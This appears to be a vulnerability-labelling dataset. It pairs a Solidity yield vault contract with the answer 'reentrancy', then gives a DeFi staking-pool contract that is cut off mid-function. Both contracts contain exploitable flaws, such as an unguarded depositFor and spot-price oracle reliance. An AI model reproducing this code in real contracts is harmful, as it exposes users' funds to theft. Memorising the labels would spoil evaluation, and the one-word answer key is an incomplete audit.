35      * @param _approvalDelay the delay before a new strat can be approved.
36      */
37     constructor (
38         IStrategy _strategy,
39         string memory _name,
40         string memory _symbol,
41         uint256 _approvalDelay
42     ) public ERC20(
43         _name,
44         _symbol
45     ) {
46         strategy = _strategy;
47         approvalDelay = _approvalDelay;
48     }

49     function want() public view returns (IERC20) {
50         return IERC20(strategy.want());
51     }

52     /**
53      * @dev It calculates the total underlying value of {token} held by the system.
54      * It takes into account the vault contract balance, the strategy contract balance
55      *  and the balance deployed in other contracts as part of the strategy.
56      */
57     function balance() public view returns (uint) {
58         return want().balanceOf(address(this)).add(IStrategy(strategy).balanceOfPool());
59     }

60     /**
61      * @dev Custom logic in here for how much the vault allows to be borrowed.
62      * We return 100% of tokens for now. Under certain conditions we might
63      * want to keep some of the system funds at hand in the vault, instead
64      * of putting them to work.
65      */
66     function available() public view returns (uint256) {
67         return want().balanceOf(address(this));
68     }

69     /**
70      * @dev Function for various UIs to display the current value of one of our yield tokens.
71      * Returns an uint256 with 18 decimals of how much underlying asset one vault share represents.
72      */
73     function getPricePerFullShare() public view returns (uint256) {
74         return totalSupply() == 0 ? 1e18 : balance().mul(1e18).div(totalSupply());
75     }

76     /**
77      * @dev A helper function to call deposit() with all the sender's funds.
78      */
79     function depositAll() external {
80         deposit(want().balanceOf(msg.sender));
81     }

82     /**
83      * @dev The entrypoint of funds into the system. People deposit with this function
84      * into the vault. The vault is then in charge of sending funds into the strategy.
85      */
86     function deposit(uint _amount) public nonReentrant {
87         require(_amount > 0, "!deposit zero");

88         uint256 _pool = balance();
89         want().safeTransferFrom(msg.sender, address(this), _amount);
90         earn();
91         uint256 _after = balance();
92         _amount = _after.sub(_pool); // Additional check for deflationary tokens
93         uint256 shares = 0;
94         if (totalSupply() == 0) {
95             shares = _amount;
96         } else {
97             shares = (_amount.mul(totalSupply())).div(_pool);
98         }
99         _mint(msg.sender, shares);
100     }

101     /**
102      * @dev Function to send funds into the strategy and put them to work. It's primarily called
103      * by the vault's deposit() function.
104      */
105     function earn() public {
106         uint _bal = available();
107         IERC20(want()).safeTransfer(address(strategy), _bal);
108         IStrategy(strategy).deposit();
109     }

110     /**
111      * @dev A helper function to call withdraw() with all the sender's funds.
112      */
113     function withdrawAll() external {
114         withdraw(balanceOf(msg.sender));
115     }

116     /**
117      * @dev Function to exit the system. The vault will withdraw the required tokens
118      * from the strategy and pay up the token holder. A proportional number of IOU
119      * tokens are burned in the process.
120      */
121     function withdraw(uint256 _shares) public {
122         uint256 r = (balance().mul(_shares)).div(totalSupply());
123         _burn(msg.sender, _shares);

124         uint b = want().balanceOf(address(this));
125         if (b < r) {
126             uint _withdraw = r.sub(b);
127             strategy.withdraw(_withdraw);
128             uint _after = want().balanceOf(address(this));
129             uint _diff = _after.sub(b);
130             if (_diff < _withdraw) {
131                 r = b.add(_diff);
132             }
133         }

134         want().safeTransfer(msg.sender, r);
135     }

136     /** 
137      * @dev Sets the candidate for the new strat to use with this vault.
138      * @param _implementation The address of the candidate strategy.  
139      */
140     function proposeStrat(address _implementation) public onlyOwner {
141         require(address(this) == IStrategy(_implementation).vault(), "Proposal not valid for this Vault");
142         stratCandidate = StratCandidate({
143             implementation: _implementation,
144             proposedTime: block.timestamp
145          });

146         emit NewStratCandidate(_implementation);
147     }

148     /** 
149      * @dev It switches the active strat for the strat candidate. After upgrading, the 
150      * candidate implementation is set to the 0x00 address, and proposedTime to a time 
151      * happening in +100 years for safety. 
152      */

153     function upgradeStrat() public onlyOwner {
154         require(stratCandidate.implementation != address(0), "There is no candidate");
155         require(stratCandidate.proposedTime.add(approvalDelay) < block.timestamp, "Delay has not passed");

156         emit UpgradeStrat(stratCandidate.implementation);

157         strategy.retireStrat();
158         strategy = IStrategy(stratCandidate.implementation);
159         stratCandidate.implementation = address(0);
160         stratCandidate.proposedTime = 5000000000;

161         earn();
162     }

163     /**
164      * @dev Rescues random funds stuck that the strat can't handle.
165      * @param _token address of the token to rescue.
166      */
167     function inCaseTokensGetStuck(address _token) external onlyOwner {
168         require(_token != address(want()), "!token");

169         uint256 amount = IERC20(_token).balanceOf(address(this));
170         IERC20(_token).safeTransfer(msg.sender, amount);
171     }

172     function depositFor(address token, uint _amount,address user ) public {

173         uint256 _pool = balance();
174         IERC20(token).safeTransferFrom(msg.sender, address(this), _amount);
175         earn();
176         uint256 _after = balance();
177         _amount = _after.sub(_pool); // Additional check for deflationary tokens
178         uint256 shares = 0;
179         if (totalSupply() == 0) {
180             shares = _amount;
181         } else {
182             shares = (_amount.mul(totalSupply())).div(_pool);
183         }
184         _mint(user, shares);
185     }
186 }
What are the vulnerabilities in the contract?
reentrancy
<end of text>
1 // SPDX-License-Identifier: MIT

2 pragma solidity 0.8.12;

3 import "@openzeppelin/contracts-upgradeable/token/ERC20/utils/SafeERC20Upgradeable.sol";
4 import "./interfaces/IWETH.sol";
5 import "./interfaces/IGymMLM.sol";
6 import "./interfaces/IPancakeRouter02.sol";
7 import "./interfaces/IERC20Burnable.sol";
8 import "@openzeppelin/contracts-upgradeable/access/OwnableUpgradeable.sol";
9 import "@openzeppelin/contracts-upgradeable/security/ReentrancyGuardUpgradeable.sol";
10 import "./interfaces/IPancakePair.sol";
11 import "./interfaces/IPancakeFactory.sol";
12 import "@quant-finance/solidity-datetime/contracts/DateTime.sol";
13 import "./interfaces/IGymLevelPool.sol";
14 import "./interfaces/IGymSinglePool.sol";
15 /* preserved Line */
16 /* preserved Line */
17 /* preserved Line */
18 /* preserved Line */
19 /* preserved Line */

20 /**
21  * @notice GymSinglePool contract:
22  * - Users can:
23  *   # Deposit GYMNET
24  *   # Withdraw assets
25  */

26 contract GymSinglePool is ReentrancyGuardUpgradeable, OwnableUpgradeable {
27     using SafeERC20Upgradeable for IERC20Upgradeable;

28    /**
29      * @notice Info of each user
30      * One Address can have many Deposits with different periods. Unlimited Amount.
31      * Total Depsit Tokens = Total amount of user active stake in all.
32      * Total Depsit Dollar Value = Total Dollar Value over all staking single pools. Calculated when user deposits tokens, and dollar value is for that exact moment rate.
33      * level = level qualification for this pool. Used internally, for global qualification please check MLM Contract.
34      * depositId = incremental ID of deposits, eg. if user has 3 stakings then this value will be 2;
35      * totalClaimt = Total amount of tokens user claimt. 
36      */
37     struct UserInfo {
38         uint256 totalDepositTokens;
39         uint256 totalDepositDollarValue;
40         uint256 level;
41         uint256 depositId;
42         uint256 totalClaimt;
43     }

44    /** 
45      * @notice Info for each staking by ID
46      * One Address can have many Deposits with different periods. Unlimited Amount.
47      * depositTokens = amount of tokens for exact deposit.
48      * depositDollarValue = Dollar value of deposit.
49      * stakePeriod = Locking Period - from 3 months to 30 months. value is integer
50      * depositTimestamp = timestamp of deposit
51      * withdrawalTimestamp = Timestamp when user can withdraw his locked tokens
52      * rewardsGained = amount of rewards user has gained during the process
53      * is_finished = checks if user has already withdrawn tokens
54      */
55     struct UserDeposits {
56         uint256 depositTokens;
57         uint256 depositDollarValue;
58         uint256 stakePeriod;
59         uint256 depositTimestamp;
60         uint256 withdrawalTimestamp;
61         uint256 rewardsGained;
62         uint256 rewardsClaimt;
63         uint256 rewardDebt;
64         bool is_finished;
65     }
66     /**
67      * @notice Info of Pool
68      * @param lastRewardBlock: Last block number that reward distribution occurs
69      * @param accUTacoPerShare: Accumulated rewardPool per share, times 1e18
70      * @param rewardPerBlock: How many reward tokens will user get per block
71      */
72     struct PoolInfo {
73         uint256 lastRewardBlock;
74         uint256 accRewardPerShare;
75         uint256 rewardPerBlock;
76     }

77     /// Startblock number
78     uint256 public startBlock;
79     uint256 public withdrawFee;

80      // MLM Contract - RelationShip address
81     address public relationship;
82     /// Treasury address where will be sent all unused assets
83     address public treasuryAddress;
84     /// Info of pool.
85     PoolInfo public poolInfo;
86     /// Info of each user that staked tokens.
87     mapping(address => UserInfo) public userInfo;

88     /// accepts user address and id of element to select - returns information about selected staking by id
89     mapping (address=>UserDeposits[]) public user_deposits;

90     uint256 private lastChangeBlock;

91     /// GYMNET token contract address
92     address public tokenAddress;

93     /// address of pancake Router
94     address public pancakeRouterAddress;
95     /// WBNB and BUSD Token Pair address, element 0 = Address of WBNB Token, element 1= Address of GYMNET 
96     address[] public wbnbAndUSDTTokenArray;
97     /// GYMNET and WBNB Token Pair address, element 0 = Address of GYMNET, element 1 = Address of WBNB Token, 
98     address[] public GymWBNBPair;

99     /// Level Qualifications for the pool
100     uint256[16] public levels;
101     /// Locking Periods 
102     uint256[6] public months;

103     /// Amount of Total GYMNET Locked in the pool
104     uint256 public totalGymnetLocked;

105     /// Amount of GYMNET all users has claimt over time.
106     uint256 public totalClaimtInPool;

107     /// Percent that will be sent to MLM Contract for comission distribution
108     uint256 public RELATIONSHIP_REWARD;

109     /// 6% comissions
110     uint256 public poolRewardsAmount;

111     address public holderRewardContractAddress;

112     address public runnerScriptAddress;
113     uint256 public totalBurntInSinglePool;
114     bool public isPoolActive;
115     bool public isInMigrationToVTwo;
116     uint256 public totalGymnetUnlocked;
117     uint256 public unlockedTimestampQualification;
118     address public vaultContractAddress;
119     address public farmingContractAddress;

120     address public levelPoolContractAddress;
121     address public newSinglePoolAddress;

122     /* ========== EVENTS ========== */

123     event Initialized(address indexed executor, uint256 at);
124     event Deposit(address indexed user, uint256 amount,uint indexed period);
125     event Withdraw(address indexed user, uint256 amount,uint indexed period);
126     event RewardPaid(address indexed token, address indexed user, uint256 amount);
127     event ClaimUserReward(address indexed user, uint256 amount);


128     modifier onlyRunnerScript() {
129         require(msg.sender == runnerScriptAddress || msg.sender == owner(), "Only Runner Script");
130         _;
131     }
132     modifier onlyBank() {
133         require(msg.sender == vaultContractAddress, "GymFarming:: Only bank");
134         _;
135     }
136     receive() external payable {}

137     fallback() external payable {}

138 // all initialize parameters are mandatory
139     function initialize(
140         uint256 _startBlock,
141         address _gym,
142         address _mlm,
143         uint256 _gymRewardRate,
144         address _pancakeRouterAddress,
145         address[] memory _wbnbAndUSDTTokenArray,
146         address[] memory _GymWBNBPair
147     ) external initializer {
148         require(block.number < _startBlock, "SinglePool: Start block must have a bigger value");

149         startBlock = _startBlock; // Number of Upcoming Block
150         relationship = _mlm;  // address of MLM contract
151         tokenAddress = _gym; // address of GYMNET Contract
152         pancakeRouterAddress = _pancakeRouterAddress; // Address of Pancake Router
153         wbnbAndUSDTTokenArray = _wbnbAndUSDTTokenArray; // WBNB And USDT Token Addresses [WBNB,USDT]
154         GymWBNBPair = _GymWBNBPair; // GYMNET And WBNB Token Addresses [GYMNET,WBNB]
155         runnerScriptAddress = msg.sender;
156         isPoolActive = false;
157         isInMigrationToVTwo = false;
158         RELATIONSHIP_REWARD = 39; // Relationship commission amount
159         levels = [0, 0, 200, 200, 2000, 4000, 10000, 20000, 40000, 45000, 50000, 60000, 65000, 70000, 75000, 80000]; // Internal Pool Levels
160         months = [3, 6, 12, 18, 24, 30]; // Locking Periods

161         poolInfo = PoolInfo({
162                 lastRewardBlock: _startBlock,
163                 rewardPerBlock: _gymRewardRate,
164                 accRewardPerShare: 0
165             });

166         lastChangeBlock = _startBlock;

167         __Ownable_init();
168         __ReentrancyGuard_init();
        
169         emit Initialized(msg.sender, block.number);
170     }


171     function setPoolInfo(uint256 lastRewardBlock,uint256 accRewardPerShare, uint256 rewardPerBlock) external onlyOwner {
172         poolInfo = PoolInfo({
173                 lastRewardBlock: lastRewardBlock,
174                 accRewardPerShare: accRewardPerShare,
175                 rewardPerBlock: rewardPerBlock
176             });
177     }

178     function updateStartBlock(uint256 _startBlock) external onlyOwner {
179         startBlock = _startBlock;
180     }

181     function setMLMAddress(address _relationship) external onlyOwner {
182         relationship = _relationship;
183     }

184     function setTokenAddress(address _tokenAddress) external onlyOwner {
185         tokenAddress = _tokenAddress;
186     }
187     function setVaultContractAddress(address _vaultContractAddress) external onlyOwner {
188         vaultContractAddress = _vaultContractAddress;
189     }
190     function setFarmingContractAddress(address _farmingContractAddress) external onlyOwner {
191         farmingContractAddress = _farmingContractAddress;
192     }

193     function setLevelPoolContractAddress(address _levelPoolContractAddress) external onlyOwner {
194         levelPoolContractAddress = _levelPoolContractAddress;
195     }

196     function setRelationshipReward(uint256 _amount) external onlyOwner {
197         RELATIONSHIP_REWARD = _amount;
198     }
199     function setOnlyRunnerScript(address _onlyRunnerScript) external onlyOwner {
200         runnerScriptAddress = _onlyRunnerScript;
201     }
202     function setNewSinglePoolAddress(address _newSinglePoolAddress) external onlyOwner {
203         newSinglePoolAddress = _newSinglePoolAddress;
204     }

205     function setGymWBNBPair(address[] memory  _GymWBNBPair) external onlyOwner {
206         GymWBNBPair = _GymWBNBPair;
207     }
208     function setPancakeRouterAddress(address _pancakeRouterAddress) external onlyOwner {
209         pancakeRouterAddress = _pancakeRouterAddress;
210     }

211     function setIsPoolActive(bool _isPoolActive) external onlyOwner {
212         isPoolActive = _isPoolActive;
213     }
214     function setIsInMigrationToVTwo(bool _isInMigrationToVTwo) external onlyOwner {
215         isInMigrationToVTwo = _isInMigrationToVTwo;
216     }

217     function setHolderRewardContractAddress(address _holderRewardContractAddress) external onlyOwner {
218         holderRewardContractAddress = _holderRewardContractAddress;
219     }


220     function setWbnbAndUSDTTokenArray(address[] memory _wbnbAndUSDTTokenArray) external onlyOwner {
221         wbnbAndUSDTTokenArray = _wbnbAndUSDTTokenArray;
222     }
223     function setUnlockedTimestampQualification(uint256 _unlockedTimestampQualification) external onlyOwner {
224         unlockedTimestampQualification = _unlockedTimestampQualification;
225     }
226     function setLevels(uint256[16] calldata _levels) external onlyOwner {
227         levels = _levels;
228     }

229      /**
230      * @notice  Function to set Treasury address
231      * @param _treasuryAddress Address of treasury address
232      */
233     function setTreasuryAddress(address _treasuryAddress) external nonReentrant onlyOwner {
234         treasuryAddress = _treasuryAddress;
235     }

236     /**
237      * @notice Deposit in given pool
238      * @param _depositAmount: Amount of want token that user wants to deposit
239      */
240     function deposit(
241         uint256 _depositAmount,
242         uint8 _periodId,
243         uint256 _referrerId,
244         bool isUnlocked
245     ) external  {
246         require(isPoolActive,'Contract is not running yet');
247         IGymMLM(relationship).addGymMLM(msg.sender, _referrerId);
248         _deposit(_depositAmount,_periodId,isUnlocked);
249     }
250     /**
251      * @notice Deposit in given pool
252      * @param _depositAmount: Amount of want token that user wants to deposit
253      */
254     function depositFromOtherContract(
255         uint256 _depositAmount,
256         uint8 _periodId,
257         bool isUnlocked,
258         address _from
259     ) external onlyBank {
260         require(isPoolActive,'Contract is not running yet');
261         _autoDeposit(_depositAmount,_periodId,isUnlocked,_from);

262         _updateLevelPoolQualification(_from);
263     }

264     /**
265      * @notice To get User level in other contract for single pool.
266      * @param _user: User address
267      */
268     function getUserLevelInSinglePool(address _user) external view returns (uint32) {
269         uint256 _totalDepositDollarValue = userInfo[_user].totalDepositDollarValue;
270         uint32 level = 0;
271         for (uint32 i = 0; i<levels.length ; i++) {
272             if(_totalDepositDollarValue >= levels[i]) {
273                 level=i;
274             }
275         }
276         return level;
277     }

278     /**
279     Should approve allowance before initiating
280     accepts depositAmount in WEI
281     periodID - id of months array accordingly
282     */
283     function _deposit(
284         uint256 _depositAmount,
285         uint8 _periodId,
286         bool _isUnlocked
287     ) private {
288         UserInfo storage user = userInfo[msg.sender];
289         IERC20Upgradeable token = IERC20Upgradeable(tokenAddress);
290         PoolInfo storage pool = poolInfo;
291         updatePool();

292         uint256 period = months[_periodId];
293         uint256 lockTimesamp = DateTime.addMonths(block.timestamp,months[_periodId]);
294         uint256 burnTokensAmount = 0;

295         if(!_isUnlocked) {
296             burnTokensAmount = (_depositAmount * 4) / 100;
297             totalBurntInSinglePool += burnTokensAmount;
298             IERC20Burnable(tokenAddress).burnFrom(msg.sender,burnTokensAmount);
299         }

        
300         uint256 amountToDeposit = _depositAmount - burnTokensAmount;

301         token.safeTransferFrom(msg.sender, address(this), amountToDeposit);
302         uint256 UsdValueOfGym = ((amountToDeposit * getPrice())/1e18) / 1e18;

303         user.totalDepositTokens += amountToDeposit;
304         user.totalDepositDollarValue += UsdValueOfGym;
305         totalGymnetLocked += amountToDeposit;
306         if(_isUnlocked) {
307             totalGymnetUnlocked += amountToDeposit;
308             period = 0; 
309             lockTimesamp = DateTime.addSeconds(block.timestamp,months[_periodId]);
310         }

311         uint256 rewardDebt = (amountToDeposit * (pool.accRewardPerShare)) / (1e18);
312         UserDeposits memory depositDetails = UserDeposits(
313             {
314                 depositTokens: amountToDeposit, 
315                 depositDollarValue: UsdValueOfGym,
316                 stakePeriod: period,
317                 depositTimestamp: block.timestamp,
318                 withdrawalTimestamp: lockTimesamp,
319                 rewardsGained: 0,
320                 is_finished: false,
321                 rewardsClaimt: 0,
322                 rewardDebt: rewardDebt
323             }
324         );

325         user_deposits[msg.sender].push(depositDetails);
326         user.depositId = user_deposits[msg.sender].length;
        

327        for (uint i = 0; i<levels.length ; i++) {
328             if(user.totalDepositDollarValue >= levels[i]) {
329                 user.level=i;
330             }
331         }
332         _updateLevelPoolQualification(msg.sender);
333         emit Deposit(msg.sender, _depositAmount,_periodId);
334     }

335      /**
336     Should approve allowance before initiating
337     accepts depositAmount in WEI
338     periodID - id of months array accordingly
339     */
340     function _autoDeposit(
341         uint256 _depositAmount,
342         uint8 _periodId,
343         bool _isUnlocked,
344         address _from
345     ) private {
346         UserInfo storage user = userInfo[_from];
347         IERC20Upgradeable token = IERC20Upgradeable(tokenAddress);
348         PoolInfo storage pool = poolInfo;
349         token.approve(address(this), _depositAmount);
350         updatePool();
351         uint256 period = months[_periodId];
352         uint256 lockTimesamp = DateTime.addMonths(block.timestamp,months[_periodId]);
353         uint256 burnTokensAmount = 0;
354         // if(!_isUnlocked) {
355         //     uint256 burnTokensAmount = (_depositAmount * 4) / 100;
356         //     totalBurntInSinglePool += burnTokensAmount;
357         //     IERC20Burnable(tokenAddress).burnFrom(msg.sender,burnTokensAmount);
358         // }
359         uint256 amountToDeposit = _depositAmount - burnTokensAmount;
360         uint256 UsdValueOfGym = ((amountToDeposit * getPrice())/1e18) / 1e18;

361         user.totalDepositTokens += amountToDeposit;
362         user.totalDepositDollarValue += UsdValueOfGym;
363         totalGymnetLocked += amountToDeposit;
364         if(_isUnlocked) {
365             totalGymnetUnlocked += amountToDeposit;
366             period = 0; 
367             lockTimesamp = DateTime.addSeconds(block.timestamp,months[_periodId]);
368         }

369         uint256 rewardDebt = (amountToDeposit * (pool.accRewardPerShare)) / (1e18);
370         UserDeposits memory depositDetails = UserDeposits(
371             {
372                 depositTokens: amountToDeposit, 
373                 depositDollarValue: UsdValueOfGym,
374                 stakePeriod: period,
375                 depositTimestamp: block.timestamp,
376                 withdrawalTimestamp: lockTimesamp,
377                 rewardsGained: 0,
378                 is_finished: false,
379                 rewardsClaimt: 0,
380                 rewardDebt: rewardDebt
381             }
382         );
383         user_deposits[_from].push(depositDetails);
384         user.depositId = user_deposits[_from].length;
 
385         emit Deposit(_from, amountToDeposit,_periodId);
386     }

387      /**
388      * Returns the latest price
389      */
390     function getPrice () public view returns (uint) {
391         uint256[] memory gymPriceInUSD = IPancakeRouter02(pancakeRouterAddress).getAmountsOut(1000000000000000000,GymWBNBPair);
392         uint256[] memory BNBPriceInUSD = IPancakeRouter02(pancakeRouterAddress).getAmountsOut(1, wbnbAndUSDTTokenArray);
393         return gymPriceInUSD[1] * BNBPriceInUSD[1];
394     }


395     /**
396      * @notice withdraw one claim
397      * @param _depositId: is the id of user element. 
398      */
399     function withdraw(
400         uint256 _depositId
401     ) external  {
402         require(_depositId >= 0, "Value is not specified");
403         updatePool();
404         _withdraw(_depositId);

405         _updateLevelPoolQualification(msg.sender);
406     }

407     /**
408     Should approve allowance before initiating
409     accepts _depositId - is the id of user element. 
410     */
411     function _withdraw(
412             uint256 _depositId
413         ) private {
414             UserInfo storage user = userInfo[msg.sender];
415             IERC20Upgradeable token = IERC20Upgradeable(tokenAddress);
416             PoolInfo storage pool = poolInfo;
417             UserDeposits storage depositDetails = user_deposits[msg.sender][_depositId];
418             if(!isInMigrationToVTwo) {
419                 require(block.timestamp > depositDetails.withdrawalTimestamp,"Locking Period isn't over yet.");
420             }
421             require(!depositDetails.is_finished,"You already withdrawn your deposit.");

422             _claim(_depositId,1);
423             depositDetails.rewardDebt = (depositDetails.depositTokens * (pool.accRewardPerShare)) / (1e18);

424             user.totalDepositTokens -=  depositDetails.depositTokens;
425             user.totalDepositDollarValue -=  depositDetails.depositDollarValue;
426             totalGymnetLocked -= depositDetails.depositTokens;
427             if(depositDetails.stakePeriod == 0) {
428                 totalGymnetUnlocked -= depositDetails.depositTokens;
429             }
            
430             token.safeTransferFrom(address(this),msg.sender, depositDetails.depositTokens);

431             for (uint i = 0; i<levels.length ; i++) {
432                 if(user.totalDepositDollarValue >= levels[i]) {
433                     user.level=i;
434                 }
435             }
436             depositDetails.is_finished = true;
437             emit Withdraw(msg.sender,  depositDetails.depositTokens,depositDetails.stakePeriod);


438         }


439     /**
440      * @notice Claim rewards you gained over period
441      * @param _depositId: is the id of user element. 
442      */
443     function claim(
444         uint256 _depositId
445     ) external  {
446         require(_depositId >= 0, "Value is not specified");
447         updatePool();
448         refreshMyLevel(msg.sender);
449         _claim(_depositId,0);
450     }

451    /*
452     Should approve allowance before initiating
453     accepts _depositId - is the id of user element. 
454     */
455     function _claim(
456             uint256 _depositId,
457             uint256 fromWithdraw
458         ) private {
459             UserInfo storage user = userInfo[msg.sender];
460             IERC20Upgradeable token = IERC20Upgradeable(tokenAddress);
461             UserDeposits storage depositDetails = user_deposits[msg.sender][_depositId];
462             PoolInfo storage pool = poolInfo;

463             uint256 pending = pendingReward(_depositId,msg.sender);

464             if(fromWithdraw == 0) {
465                 require(pending > 0 ,"No rewards to claim.");
466             }


467             if (pending > 0) {
468                 uint256 distributeRewardTokenAmt = (pending * RELATIONSHIP_REWARD) / 100;
469                 token.safeTransfer(relationship, distributeRewardTokenAmt);
470                 IGymMLM(relationship).distributeRewards(pending, address(tokenAddress), msg.sender, 3);

471                 // 6% distribution 
472                 uint256 calculateDistrubutionReward = (pending * 6) / 100;
473                 poolRewardsAmount += calculateDistrubutionReward; 
                
474                 uint256 calcUserRewards = (pending-distributeRewardTokenAmt-calculateDistrubutionReward);
475                 safeRewardTransfer(tokenAddress, msg.sender, calcUserRewards);

476                 user.totalClaimt += calcUserRewards;
477                 totalClaimtInPool += pending;
478                 depositDetails.rewardsClaimt += pending;
479                 depositDetails.rewardDebt = (depositDetails.depositTokens * (pool.accRewardPerShare)) / (1e18);
480                 emit ClaimUserReward(msg.sender,  calcUserRewards);
481                  depositDetails.rewardsGained = 0;
482             }
            
483             // token.safeTransferFrom(address(this),msg.sender, depositDetails.rewardsGained);

484         }


      
485    /*
486     transfers pool commisions to management
487     */
488     function transferPoolRewards() public onlyRunnerScript {
489             require(address(holderRewardContractAddress) != address(0x0),"Holder Reward Address::SET_ZERO_ADDRESS");
490             IERC20Upgradeable token = IERC20Upgradeable(tokenAddress);
491             token.safeTransfer(holderRewardContractAddress, poolRewardsAmount);
492             // token.safeTransfer(relationship, poolRewardsAmount/2);
493             poolRewardsAmount = 0;
494         }  


495     /**
496      * @notice  Safe transfer function for reward tokens
497      * @param _rewardToken Address of reward token contract
498      * @param _to Address of reciever
499      * @param _amount Amount of reward tokens to transfer
500      */
501     function safeRewardTransfer(
502         address _rewardToken,
503         address _to,
504         uint256 _amount
505     ) internal {
506         uint256 _bal = IERC20Upgradeable(_rewardToken).balanceOf(address(this));
507         if (_amount > _bal) {
508             require(IERC20Upgradeable(_rewardToken).transfer(_to, _bal), "GymSinglePool:: Transfer failed");
509         } else {
510             require(IERC20Upgradeable(_rewardToken).transfer(_to, _amount), "GymSinglePool:: Transfer failed");
511         }
512     }
513     /**
514      * @notice To get User Info in other contract.
515      */
516     function getUserInfo(address _user) external view returns (UserInfo memory) {
517         return userInfo[_user];
518     }

519         /**
520      * @notice View function to see pending reward on frontend.
521      * @param _depositId: Staking pool id
522      * @param _user: User address
523      */
524     function pendingReward(uint256 _depositId, address _user) public view returns (uint256) {
525         UserDeposits storage depositDetails = user_deposits[_user][_depositId];
526         UserInfo storage user = userInfo[_user];
527         PoolInfo storage pool = poolInfo;
528         if(depositDetails.is_finished == true || depositDetails.stakePeriod == 0){
529             return 0;
530         }
      
531         uint256 _accRewardPerShare = pool.accRewardPerShare;
532         uint256 sharesTotal = totalGymnetLocked-totalGymnetUnlocked;

533         if (block.number > pool.lastRewardBlock && sharesTotal != 0) {
534             uint256 _multiplier = block.number - pool.lastRewardBlock;
535             uint256 _reward = (_multiplier * pool.rewardPerBlock);
536              _accRewardPerShare = _accRewardPerShare + ((_reward * 1e18) / sharesTotal);
537         }

538         return (depositDetails.depositTokens * _accRewardPerShare) / (1e18) - (depositDetails.rewardDebt);
539     }


540     /**
541      * @notice Update reward variables of the given pool to be up-to-date.
542      */
543     function updatePool() public {
544         PoolInfo storage pool = poolInfo;
545         if (block.number <= pool.lastRewardBlock) {
546             return;
547         }
548         uint256 sharesTotal = totalGymnetLocked-totalGymnetUnlocked;
549         if (sharesTotal == 0) {
550             pool.lastRewardBlock = block.number;
551             return;
552         }
553         uint256 multiplier = block.number - pool.lastRewardBlock;
554         if (multiplier <= 0) {
555             return;
556         }
557         uint256 _rewardPerBlock = pool.rewardPerBlock;
558         uint256 _reward = (multiplier * _rewardPerBlock);
559         pool.accRewardPerShare = pool.accRewardPerShare + ((_reward * 1e18) / sharesTotal);
560         pool.lastRewardBlock = block.number;
561     }
562     /**
563      * @notice Claim All Rewards in one Transaction Internat Function.
564      * If reinvest = true, Rewards will be reinvested as a new Staking
565      * Reinvest Period Id is the id of months element
566      */
567     function _claimAll(bool reinvest,uint8 reinvestPeriodId) private {
568         UserInfo storage user = userInfo[msg.sender];
569         IERC20Upgradeable token = IERC20Upgradeable(tokenAddress);
570         PoolInfo storage pool = poolInfo;
571          updatePool();
572          uint256 distributeRewardTokenAmtTotal = 0;
573          uint256 calcUserRewardsTotal = 0;
574          uint256 totalDistribute = 0;
575         for (uint256 i = 0; i<user.depositId ; i++) {
576             UserDeposits storage depositDetails = user_deposits[msg.sender][i];
577             uint256 pending = pendingReward(i,msg.sender);
578             totalDistribute += pending;
579             if (pending > 0) {
580                 uint256 distributeRewardTokenAmt = (pending * RELATIONSHIP_REWARD) / 100;
581                  distributeRewardTokenAmtTotal += distributeRewardTokenAmt;
582                 // 6% distribution 
583                 uint256 calculateDistrubutionReward = (pending * 6) / 100;
584                 poolRewardsAmount += calculateDistrubutionReward; 
                
585                 uint256 calcUserRewards = (pending-distributeRewardTokenAmt-calculateDistrubutionReward);
586                 calcUserRewardsTotal += calcUserRewards;

587                 user.totalClaimt += calcUserRewards;
588                 totalClaimtInPool += pending;
589                 depositDetails.rewardsClaimt += pending;
590                 depositDetails.rewardDebt = (depositDetails.depositTokens * (pool.accRewardPerShare)) / (1e18);
591                 emit ClaimUserReward(msg.sender,  calcUserRewards);
592                  depositDetails.rewardsGained = 0;
593             }
            
594         }
595         token.safeTransfer(relationship, distributeRewardTokenAmtTotal);
596         IGymMLM(relationship).distributeRewards(totalDistribute, address(tokenAddress), msg.sender, 3);
597         safeRewardTransfer(tokenAddress, msg.sender, calcUserRewardsTotal);
598         if(reinvest == true) {
599           _deposit(calcUserRewardsTotal,reinvestPeriodId,false);
600         }
601     }
602     /**
603      * @notice Claim All Rewards in one Transaction.
604      */
605     function claimAll() public {
606          refreshMyLevel(msg.sender);
607         _claimAll(false,0);
608     }
609     /**
610      * @notice Claim and Reinvest all rewards public function to trigger internal _claimAll function.
611      */
612     function claimAndReinvest(bool reinvest,uint8 periodId) public {
613         require(isPoolActive,'Contract is not running yet');
614         _claimAll(reinvest,periodId);
615     }

616     function refreshMyLevel(address _user) public {
617         UserInfo storage user = userInfo[_user];
618         for (uint i = 0; i<levels.length ; i++) {
619             if(user.totalDepositDollarValue >= levels[i]) {
620                 user.level=i;
621             }
622         }
623     }
624     function totalLockedTokens(address _user) public view returns (uint256) {
625         UserInfo storage user = userInfo[_user];
626         uint256 totalDepositLocked = 0;
627         for (uint256 i = 0; i<user.depositId ; i++) {
628             UserDeposits storage depositDetails = user_deposits[_user][i];
629             if(depositDetails.stakePeriod != 0 && !depositDetails.is_finished) {
630                 totalDepositLocked += depositDetails.depositTokens;
631             } 
632         }
633         return totalDepositLocked;
634     }

635     function switchToUnlocked(uint256 _depositId) public {
636         UserInfo storage user = userInfo[msg.sender];
637         UserDeposits storage depositDetails = user_deposits[msg.sender][_depositId];
638         require(depositDetails.depositTimestamp <= unlockedTimestampQualification,'Function is only for Users that deposited before Unlocked Staking Upgrade');
639         _claim(_depositId,1);
640         uint256 lockTimesamp = DateTime.addSeconds(block.timestamp,1);

641         depositDetails.stakePeriod = 0;
642         depositDetails.withdrawalTimestamp = lockTimesamp;
643         totalGymnetUnlocked += depositDetails.depositTokens;

644     }

645     function _updateLevelPoolQualification(address wallet) internal {
646         uint256 userLevel = IGymMLM(relationship).getUserCurrentLevel(wallet);
647         IGymLevelPool(levelPoolContractAddress).updateUserQualification(wallet, userLevel);
648     }

649     function transferToV2(uint8 _periodId,bool isUnlocked) public {
650         require(address(0) != newSinglePoolAddress,'Single pool cannot be Zero address');
651         UserInfo storage user = userInfo[msg.sender];
652          require(user.totalDepositTokens > 0,'You dont have Any Deposits to Transfer');
653          if(isUnlocked) {
654             _periodId = 0;
655          }
656         _claimAll(false,0);
657         uint256 dollarValueOfDeposits = user.totalDepositDollarValue * 1e18;
658         IGymSinglePool(newSinglePoolAddress).transferFromOldVersion(
659              user.totalDepositTokens,
660              _periodId,
661              isUnlocked,
662              msg.sender,
663              dollarValueOfDeposits
664         );
665         for (uint32 i = 0; i<user.depositId ; i++) {
666             UserDeposits storage depositDetails = user_deposits[msg.sender][i];
